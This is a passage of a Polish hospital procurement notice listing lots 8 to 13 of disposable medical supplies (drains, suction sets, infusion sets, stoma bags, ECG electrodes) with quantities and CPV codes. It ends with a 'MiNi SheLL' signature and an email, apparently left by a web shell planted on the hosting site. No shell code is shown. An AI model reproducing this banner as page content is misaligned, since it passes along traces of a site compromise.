<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1Dren Kehra ch 8, ch 10, ch 12, 30 x 13-szt. 45; 2 Dren Kehra ch 14, ch 16, ch 18, ch 20, ch 22, ch 24, 50 x 16-szt. 35; 3 Dreny sterylne typ REDON ch 10-18-szt. 1 600; 4 Łącznik do przerywanego odsysania - sterylny-szt. 1 000; 5 Zestaw do odsysania pola operacyjnego z końcówką typ Yankauer. Kanka zgięta, perforowana z 4 otworami, wyposażona  w przezroczystą, użebrowaną rączkę.Dren o  długości min. 200 cm, średnicy 8 mm, profilowany, antyzagięciowy z uniwersalnymi łącznikami. Zestaw sterylny pakowany podwójnie.-szt. 1 500; 6 Zestaw do odsysania pola operacyjnego, sterylny, z końcówka typ Pool, kanka zgięta o średnicy zewn. 8/6 mm i długości min.250 mm. Dren łączący o średnicy zewn.6 mm i długości min. 200 cm. Dren profilowany, zabezpieczajacy przed jego załamaniem.-szt. 50; 7 Wąż do ssaka /dren łączący do odsysania/ - o długości od 1,5 - 2 m., średnicy wew. 5-8 mm, profilowany, antyzgięciowy z uniwersalnymi łącznikami, sterylny opakowanie podwójne. Wyposażony dodatkowo w męski, prosty łącznik.- szt. 1 350; 8 Butelka do ssania system próżniowy REDON poj. 150 ml wysokociśnieniowy z drenem- szt. 1 200; 9 Butelka do ssania system próżniowy REDON poj. 600 ml wysokociśnieniowy z drenem-szt. 600; 10 Dren do jamy otrzewnowej lateks ch. 22 - 24-szt. 30; 11 Dren do jamy otrzewnowej silikonowany ch. 22 - 36-szt. 500; 12 Cewnik do karmienia niemowląt ch 6 -8-szt. 150; 13 Zgłębnik żołądkowy długość 125 cm ze znacznikami głębokości 12 - 22 ch-szt. 1 000; 14 Zgłębnik PUR  z prowadnicą i wielofunkcyjnym łącznikiem-szt. 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PRZYRZĄD DO POMPY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw infuzyjny standardowy  dla dorosłych 8C 820 do pompy GRASEBY-szt. 150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.24-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> SPRZĘT MEDYCZNY JEDNORAZOWY (różny).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Etykieta  (naklejka) na probówkę (1 op. a 100 szt.) - 1 000 op.; 2 Fartuch foliowy tzw. przedniak-szt. 3 000; 3 Folia-koc izotermiczny-szt. 300; 4 Golarka medyczna-szt. 6 000; 5 Kanka odbytnicza dla dorosłych ch 30 , 10 x 400 mm-szt. 30; 6 Kanka odbytnicza dla dzieci ch 16 długość 200 mm-szt. 30; 7 Kieliszki jednorazowe - plastikowe (op. a 100 szt.) -650 op.; 8 Kranik - rampa pięciodrożny- szt. 150; 9 Kranik trójdrożny-szt. 4 800; 9 Kranik LUER-LOK z drenem-szt. 70; 10 Nerka jednorazowa-szt. 34 000; 11 Ochraniacze na obuwie jednorazowe na gumce - szt. 5 000; 12 Opaska do identyfikacji dzieci i dorosłych- szt.1 000; 13 Opaska do identyfikacji noworodków (bezpieczne  zapięcie)-szt. 2 800; 14 Osłonki medyczne - prezerwatywy-pakowana pojedyńczo-szt. 4 200; 15 Pałeczki do wymazów sterylne - długość 22 cm-szt. 4 800; 16 Patyczek drewniany bez wacika (1 op. a 100 szt.)-20 op.; 17 Pinceta jednorazowa-szt. 1 500; 18 Probówka do wymazów - sucha-szt.2 200; 19 Słuchawka lekarska-szt. 20; 20 Staza automatyczna posiadająca  prosty mechanizm umożliwiajacy łatwe zapinanie i odpinanie oraz płynną zmianę siły zacisku-szt. 100; 21 Staza gumowa-szt. 10; 22 Szczoteczki chirurgiczne-szt. 100;
23 Szpatułki drewniane (1 op. a 100 szt.) - 150 op.; 24 Worek do zwłok zapinany na zamek-szt. 40; 25 Wymazówka okulistyczna plastikowa, dł.130 mm z wacikiem, w probówce średnica oczka 1,5 mm pakowana pojedyńczo, sterylna-szt. 100; 26 Wymazówka z podłożem AMIES-szt. 2 500; 27 Wymazówki transportowe z podłożem węglowym, pakowane idywidualnie, aplikator z tworzywa, dł 15cm, sterylne-szt. 500
28 Zaciskacz do pępowiny-szt. 500; 29 Zestaw do lewatywy mikrobiologicznie czysty-szt.1 100;  30 Zestaw do wlewów kontrastowych bez barytu-szt. 150; 31 Żel do USG - 0,5 kg-szt. 600..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> WKŁADY, KANISTRY DO SYSTEMU DO ODSYSANIA VACSAX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wkład workowy 1xużytku : a) Wkład wykonany z wysokozagęszczonego polietylenu(bez zawartosci PCV),posiadający funkcję samozasysania, uszczelniany samoczynnie po uruchomieniu ssania bez koniecznosci wciskania go w kanister i podłączenia dodatkowych urządzeń lub przełączników; b)Wyposażony w filtr antybakteryjny i hydrofobowy(nie mylić z zastawką) zabezpieczający źródło ssania przed zalaniem- automatyczne odcięcie ssania po napełnieniu się wkładu; c) Posiadajacy zintegrowaną pokrywę wyposażoną w tylko dwa króćce(porty):pacjent oraz próżnia; d)Wkład bez dodatkowych otworów w pokrywie poza króćcami ssania i pacjenta- nie dochodzi do rozszczelnienia wkładu oraz nie ma ryzyka przypadkowego wylania się substancji odsysanej i tym samym nie ma ryzyka kontaktu z wydzieliną - bezpieczne żelowanie wkładu zarówno czystego jak i odessaną wydzieliną przez króciec (port) pacjenta; e) Kompatybilnosć wkładów z kanistrami różnej pojemności- możliwość użycia mniejszych wkładów w większych kanistrach; f) Wyposażony w dwa uchwyty w postaci pętli do demontażu wkładu po jego zapełnieniu; g) Data ważności nadrukowana fabrycznie na każdym wkładzie; h) Każdy wkład wyposażony w zatyczki  na port pacjenta i port próżni; i)Podziałka co 100 ml. na wkładzie 2l;- pojemność 1000 ml- pojemność 2000 ml; - pojemność 3000 ml. - szt. 1 700;
2. Kanister wielorazowego użytku: a) Wykonany z przezroczystego, nietłukącego się tworzywa, ocechowany skalą pomiarową co 100 ml do pełnej pojemności oferowanego wkładu ( 1000, 2000, 3000, ml ); b) Odporny na środki dezynfekujące, światło UV ( lampy bakteriobójcze UV ) oraz parę; c) Kompatybilny z wkładami 1x użytku, wyposażony w uchwyt do mocowników ściennych, szynowych lub wózków jezdnych; d) Kanister nie posiada żadnych dodatkowych przyłączy (otworów) typu próżnia/ssanie. Wszystkie kanistry są wielokrotnego użytku (z możliwością ich autoklawowania w tem. do 121C)- nie zawierają PCV; e) Każdy kanister posiada informację o metodzie sterylizacji;- Pojemność 1000 ml; - Pojemność 2000 ml; - Pojemność 3000 ml. - szt. 10;
3.Torba na wymiociny jednorazowego użytku:- wykonana z przezroczystego materiału, - wyskalowana co 100 ml.; -uchwyt posiada wcięcie umożliwiające higieniczne zamknięcie, odcinające przy tym źródło przykrego zapachu, - pojemność 1500 ml.-szt.240; 4 Żel do wkładów do ssaka (op. typu wiadro a 4 kg)-szt. 15; 5 Butelka z żelem 72 g. zasysajaca się do systemu VACSAX-szt. 50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PRZYRZĄD DO ŻYWIENIA JELITOWEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Przyrząd do żywienia jelitowego G/P w wersji grawitacyjnej do opakowań miękkich typ Pack- szt. 400; 2 Przyrząd do żywienia jelitowego G/B w wersji grawitacyjnej do butelek - szt. 400..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.24-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> WOREK STOMIJNY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Worek stomijny otwarty, jednoczęściowy, przezroczysty, z zamknięciem na rzepy , rozmiar do docięcia (10 mm - 76 mm), poj. 650 ml. - szt. 600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.17.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> ELEKTRODY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Elektroda jednorazowa żelowana do EKG	 - szt. 30 000.
Wymagania dotyczące elektrody: a) Rozmiar elektrody 43 x 45 mm, podłoże na cienkiej gąbce PE, charakteryzujące się elastycznością, niealergicznością i doskonałą przyczepnością;  b) Czujnik Ag/AgCl zapewniajacy wysoką jakość sygnału; c) Żel stały, charakteryzujący się niskim poziomem impedencji oraz adhezyjnością zarówno od strony skóry pacjenta jak i czujnika, co w dużym stopniu eliminuje artefakty ruchowe; d) Przyjazne dla skóry pacjenta, hypoalergiczny klej nie powoduje podrażnień skóry oraz nie pozostaje na skórze po odklejeniu elektrody, maksymalny czas użycia 48 h.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com